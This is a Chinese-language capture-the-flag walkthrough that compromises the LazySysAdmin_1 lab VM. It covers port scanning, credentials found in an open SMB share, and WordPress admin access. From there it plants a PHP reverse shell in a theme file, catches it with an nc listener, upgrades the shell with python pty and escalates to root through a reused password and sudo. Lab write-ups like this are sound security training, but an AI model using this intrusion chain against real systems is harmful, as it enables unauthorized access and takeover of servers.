LazySysAdmin_1 靶机

信息收集

┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.1.1.130   
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-07 08:41 EDT
Nmap scan report for 192.1.1.130
Host is up (0.0028s latency).
Not shown: 65529 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3306/tcp open  mysql
6667/tcp open  irc
MAC Address: 00:0C:29:96:E4:E9 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 13.03 seconds

开放了 22,80,139,445,3306,6667 端口

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -sC -O -p22,80,139,445,3306,6667 192.1.1.130
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-07 08:43 EDT
Nmap scan report for 192.1.1.130
Host is up (0.00043s latency).

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 b5:38:66:0f:a1:ee:cd:41:69:3b:82:cf:ad:a1:f7:13 (DSA)
|   2048 58:5a:63:69:d0:da:dd:51:cc:c1:6e:00:fd:7e:61:d0 (RSA)
|   256 61:30:f3:55:1a:0d:de:c8:6a:59:5b:c9:9c:b4:92:04 (ECDSA)
|_  256 1f:65:c0:dd:15:e6:e4:21:f2:c1:9b:a3:b6:55:a0:45 (ED25519)
80/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: Silex v2.2.7
| http-robots.txt: 4 disallowed entries 
|_/old/ /test/ /TR2/ /Backnode_files/
|_http-title: Backnode
|_http-server-header: Apache/2.4.7 (Ubuntu)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open              Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL (unauthorized)
6667/tcp open  irc         InspIRCd
| irc-info: 
|   server: Admin.local
|   users: 1
|   servers: 1
|   chans: 0
|   lusers: 1
|   lservers: 0
|   source ident: nmap
|   source host: 192.1.1.128
|_  error: Closing link: (nmap@192.1.1.128) [Client exited]
MAC Address: 00:0C:29:96:E4:E9 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-time: 
|   date: 2023-07-07T12:43:23
|_  start_date: N/A
|_clock-skew: mean: -3h20m00s, deviation: 5h46m24s, median: 0s
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: lazysysadmin
|   NetBIOS computer name: LAZYSYSADMIN\x00
|   Domain name: \x00
|   FQDN: lazysysadmin
|_  System time: 2023-07-07T22:43:23+10:00
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_nbstat: NetBIOS name: LAZYSYSADMIN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.13 seconds

梳理一下信息：Ubuntu 系统，80 端口使用的是 Silex v2.2.7 搭配 apache 搭建的，存在文件 robots.txt，存在目录 /old/ /test/ /TR2/ /Backnode_files/，标题是 Backnode，139 和 445 端口运行着 Samba 并且有一般用户的权限，3306 运行着 MySQL，6667 端口运行着 irc 服务，这个不清楚是什么等会查查资料

┌──(kali㉿kali)-[~/tools/LazySysAdmin_1]
└─$ sudo nmap --script=vuln -p22,80,139,445,3306,6667 192.1.1.130 
[sudo] password for kali: 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-07 09:00 EDT
Nmap scan report for 192.1.1.130
Host is up (0.00031s latency).

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
| http-enum: 
|   /wordpress/: Blog
|   /test/: Test page
|   /robots.txt: Robots file
|   /info.php: Possible information file
|   /phpmyadmin/: phpMyAdmin
|   /wordpress/wp-login.php: Wordpress login page.
|   /apache/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)'
|_  /old/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)'
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-sql-injection: 
|   Possible sqli for queries:
|     http://192.1.1.130:80/Backnode_files/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.130:80/Backnode_files/?C=N%3BO%3DD%27%20OR%20sqlspider
|     http://192.1.1.130:80/Backnode_files/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.130:80/Backnode_files/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.130:80/Backnode_files/?C=D%3BO%3DD%27%20OR%20sqlspider
|     http://192.1.1.130:80/Backnode_files/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.130:80/Backnode_files/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.130:80/Backnode_files/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.130:80/Backnode_files/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.130:80/Backnode_files/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.130:80/Backnode_files/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.130:80/Backnode_files/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.130:80/Backnode_files/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.130:80/Backnode_files/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.130:80/Backnode_files/?C=S%3BO%3DD%27%20OR%20sqlspider
|     http://192.1.1.130:80/Backnode_files/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.130:80/Backnode_files/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.130:80/Backnode_files/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.130:80/Backnode_files/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.130:80/Backnode_files/?C=M%3BO%3DD%27%20OR%20sqlspider
|     http://192.1.1.130:80/Backnode_files/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.130:80/Backnode_files/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.130:80/Backnode_files/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.130:80/Backnode_files/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.130:80/Backnode_files/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.130:80/Backnode_files/?C=N%3BO%3DD%27%20OR%20sqlspider
|     http://192.1.1.130:80/Backnode_files/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.130:80/Backnode_files/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.130:80/Backnode_files/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.130:80/Backnode_files/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.130:80/Backnode_files/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.130:80/Backnode_files/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.130:80/Backnode_files/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.130:80/Backnode_files/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.130:80/Backnode_files/?C=S%3BO%3DA%27%20OR%20sqlspider
|_    http://192.1.1.130:80/Backnode_files/?C=N%3BO%3DA%27%20OR%20sqlspider
|_http-csrf: Couldn't find any CSRF vulnerabilities.
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3306/tcp open  mysql
6667/tcp open  irc
|_irc-unrealircd-backdoor: Server closed connection, possibly due to too many reconnects. Try again with argument irc-unrealircd-backdoor.wait set to 100 (or higher if you get this message again).
| irc-botnet-channels: 
|_  ERROR: TIMEOUT
MAC Address: 00:0C:29:96:E4:E9 (VMware)

Host script results:
|_smb-vuln-ms10-061: false
| smb-vuln-regsvc-dos: 
|   VULNERABLE:
|   Service regsvc in Microsoft Windows systems vulnerable to denial of service
|     State: VULNERABLE
|       The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
|       pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
|       while working on smb-enum-sessions.
|_          
|_smb-vuln-ms10-054: false

Nmap done: 1 IP address (1 host up) scanned in 328.29 seconds

多了一些信息：扫出来了 wordpress, test, info.php, phpmyadmin, wordpress/wp-login.php, apache, old 目录和文件，接下来先从 smb 入手吧

smb 渗透

┌──(kali㉿kali)-[~]
└─$ sudo smbmap -H 192.1.1.130        
[sudo] password for kali: 
[+] Guest session       IP: 192.1.1.130:445     Name: 192.1.1.130                                       
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        print$                                                  NO ACCESS       Printer Drivers
        share$                                                  READ ONLY       Sumshare
        IPC$                                                    NO ACCESS       IPC Service (Web server)

得到了一个特殊目录 share$，尝试 smbclient 来连接

┌──(kali㉿kali)-[~]
└─$ smbclient //192.1.1.130/share$    
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Aug 15 07:05:52 2017
  ..                                  D        0  Mon Aug 14 08:34:47 2017
  wordpress                           D        0  Tue Aug 15 07:21:08 2017
  Backnode_files                      D        0  Mon Aug 14 08:08:26 2017
  wp                                  D        0  Tue Aug 15 06:51:23 2017
  deets.txt                           N      139  Mon Aug 14 08:20:05 2017
  robots.txt                          N       92  Mon Aug 14 08:36:14 2017
  todolist.txt                        N       79  Mon Aug 14 08:39:56 2017
  apache                              D        0  Mon Aug 14 08:35:19 2017
  index.html                          N    36072  Sun Aug  6 01:02:15 2017
  info.php                            N       20  Tue Aug 15 06:55:19 2017
  test                                D        0  Mon Aug 14 08:35:10 2017
  old                                 D        0  Mon Aug 14 08:35:13 2017

                3029776 blocks of size 1024. 1456476 blocks available
smb: \>

竟然有那么多东西，根据 robots.txt 大概判断出这是网站根目录被共享了出来。首先把几个 txt 下载到本地查看

┌──(kali㉿kali)-[~/tools/LazySysAdmin_1]
└─$ cat deets.txt                           
CBF Remembering all these passwords.

Remember to remove this file and update your password after we push out the server.

Password 12345

┌──(kali㉿kali)-[~/tools/LazySysAdmin_1]
└─$ cat todolist.txt 
Prevent users from being able to view to web root using the local file browser

┌──(kali㉿kali)-[~/tools/LazySysAdmin_1]
└─$ cat robots.txt 
User-agent: *
Disallow: /old/
Disallow: /test/
Disallow: /TR2/
Disallow: /Backnode_files/

得到了一个重要信息也就是密码 12345，目前还不知道到底是谁的密码，暂时记录下来，继续查看 smb 中的文件，进入各个文件夹查看，发现最值得关注的还是 wp-config.php 文件，将其下载到本地看看有没有数据库连接密码

┌──(kali㉿kali)-[~/tools/LazySysAdmin_1]
└─$ head -n 30 wp-config.php
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don\'t have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://codex.wordpress.org/Editing_wp-config.php
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'Admin');

/** MySQL database password */
define('DB_PASSWORD', 'TogieMYSQL12345^^');

得到了 Admin:TogieMYSQL12345^^ 这样一对用户名和密码，记得之前 nmap 扫描的结果中有 phpmyadmin，尝试用上述凭据登录

phpmyadmin 登录

登录成功，不过报了很多错误，似乎是配置有点问题，不过无伤大雅，可视化界面有问题，那就直接使用 SQL 语句。在使用 SQL 语句查询的时候，一开始想直接把整个表信息显示出来：

SELECT * FROM wp-users;

但是遇到了报错，于是尝试选定字段

虽然密码是哈希存储的，但是 wordpress 登录的用户名和数据库的用户名是相同的，因此可以尝试用同一个密码登录试试

Wordpress 登录

登录成功

反弹shell

那就直接去主题编辑器中修改 404.php 文件吧

可以点击 Update File 按钮，那就在这里写入经典的 php 反向 shell，接下来要找访问链接，原本想偷懒，修改文章的链接来重定向到 404.php，但是似乎网站在这方面没配置，那就只能找真正的 404.php 的完整路径，借助于 wpscan 来找主题的路径

┌──(kali㉿kali)-[~/tools/LazySysAdmin_1]
└─$ wpscan --url http://192.1.1.130/wordpress/                                                    
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` |  _ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.24
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.1.1.130/wordpress/ [192.1.1.130]
[+] Started: Fri Jul  7 09:34:11 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Apache/2.4.7 (Ubuntu)
 |  - X-Powered-By: PHP/5.5.9-1ubuntu4.22
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.1.1.130/wordpress/xmlrpc.php
 | Found By: Link Tag (Passive Detection)
 | Confidence: 100%
 | Confirmed By: Direct Access (Aggressive Detection), 100% confidence
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.1.1.130/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Registration is enabled: http://192.1.1.130/wordpress/wp-login.php?action=register
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.1.1.130/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.1.1.130/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.8.1 identified (Insecure, released on 2017-08-02).
 | Found By: Rss Generator (Passive Detection)
 |  - http://192.1.1.130/wordpress/?feed=rss2, <generator>https://wordpress.org/?v=4.8.1</generator>
 |  - http://192.1.1.130/wordpress/?feed=comments-rss2, <generator>https://wordpress.org/?v=4.8.1</generator>

[+] WordPress theme in use: twentyfifteen
 | Location: http://192.1.1.130/wordpress/wp-content/themes/twentyfifteen/
 | Last Updated: 2023-03-29T00:00:00.000Z
 | Readme: http://192.1.1.130/wordpress/wp-content/themes/twentyfifteen/readme.txt
 | [!] The version is out of date, the latest version is 3.4
 | Style URL: http://192.1.1.130/wordpress/wp-content/themes/twentyfifteen/style.css?ver=4.8.1
 | Style Name: Twenty Fifteen
 | Style URI: https://wordpress.org/themes/twentyfifteen/
 | Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen\'s simple, st...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.8 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://192.1.1.130/wordpress/wp-content/themes/twentyfifteen/style.css?ver=4.8.1, Match: 'Version: 1.8'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <=====================================> (137 / 137) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Fri Jul  7 09:34:16 2023
[+] Requests Done: 170
[+] Cached Requests: 5
[+] Data Sent: 44.699 KB
[+] Data Received: 267.936 KB
[+] Memory used: 262.582 MB
[+] Elapsed time: 00:00:04

找到一个主题路径 http://192.1.1.130/wordpress/wp-content/themes/twentyfifteen/，于是提前在攻击机开启监听后，在浏览器中访问

虽然直接就有报错提示，但是回看 kali，反弹已经成功，完善一下交互环境，并进行最基础的立足点判断

┌──(kali㉿kali)-[~/tools/LazySysAdmin_1]
└─$ sudo nc -lvnp 443             
[sudo] password for kali: 
listening on [any] 443 ...
connect to [192.1.1.128] from (UNKNOWN) [192.1.1.130] 43140
Linux LazySysAdmin 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:06:37 UTC 2016 i686 athlon i686 GNU/Linux
 23:30:06 up 51 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can\'t access tty; job control turned off
$ which python
/usr/bin/python
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@LazySysAdmin:/$ whoami
whoami
www-data
www-data@LazySysAdmin:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@LazySysAdmin:/$ uname -a
uname -a
Linux LazySysAdmin 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:06:37 UTC 2016 i686 athlon i686 GNU/Linux
www-data@LazySysAdmin:/$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 1000
    link/ether 00:0c:29:96:e4:e9 brd ff:ff:ff:ff:ff:ff
    inet 192.1.1.130/24 brd 192.1.1.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::20c:29ff:fe96:e4e9/64 scope link 
       valid_lft forever preferred_lft forever
www-data@LazySysAdmin:/$

切换用户

smb 共享里我们已经把关键信息搜寻过了，那接下来就重点看别的信息，看看定时任务

www-data@LazySysAdmin:/var/www/html$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

没有收获，看看 home 目录

www-data@LazySysAdmin:/home$ ls
ls
togie
www-data@LazySysAdmin:/home$ cd togie
cd togie
www-data@LazySysAdmin:/home/togie$ ls
ls
www-data@LazySysAdmin:/home/togie$ ls -liah
ls -liah
total 24K
  720 drwxr-xr-x 3 togie togie 4.0K Aug 15  2017 .
  758 drwxr-xr-x 3 root  root  4.0K Aug 14  2017 ..
34865 -rw-r--r-- 1 togie togie  220 Aug 14  2017 .bash_logout
34871 -rw-r--r-- 1 togie togie 3.6K Aug 14  2017 .bashrc
37880 drwx------ 2 togie togie 4.0K Aug 14  2017 .cache
37872 -rw-r--r-- 1 togie togie  675 Aug 14  2017 .profile

用户目录下没什么有价值的隐藏文件，之前有个 12345 的密码，尝试一下能不能直接切换成 root

www-data@LazySysAdmin:/var/www/html$ su -
su -
Password: 12345

su: Authentication failure

失败，不过 home 目录下的这个用户名也可以试试

www-data@LazySysAdmin:/home$ su togie
su togie
Password: 12345

提权

切换成功了，看看这个用户有没有什么 sudo 权限

togie@LazySysAdmin:/home$ sudo -l
sudo -l
[sudo] password for togie: 12345

Matching Defaults entries for togie on LazySysAdmin:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User togie may run the following commands on LazySysAdmin:
    (ALL : ALL) ALL

好家伙，这个用户直接就拥有所有 root 权限，那直接 sudo 新开一个 bash

togie@LazySysAdmin:/home$ sudo /bin/bash
sudo /bin/bash
root@LazySysAdmin:/home# cd /root
cd /root
root@LazySysAdmin:/root# ls
ls
proof.txt
root@LazySysAdmin:/root# cat proof.txt
cat proof.txt
WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851


Well done :)

Hope you learn\'t a few things along the way.

Regards,

Togie Mcdogie




Enjoy some random strings

WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851
2d2v#X6x9%D6!DDf4xC1ds6YdOEjug3otDmc1$#slTET7
pf%&1nRpaj^68ZeV2St9GkdoDkj48Fl$MI97Zt2nebt02
bhO!5Je65B6Z0bhZhQ3W64wL65wonnQ$@yw%Zhy0U19pu
root@LazySysAdmin:/root#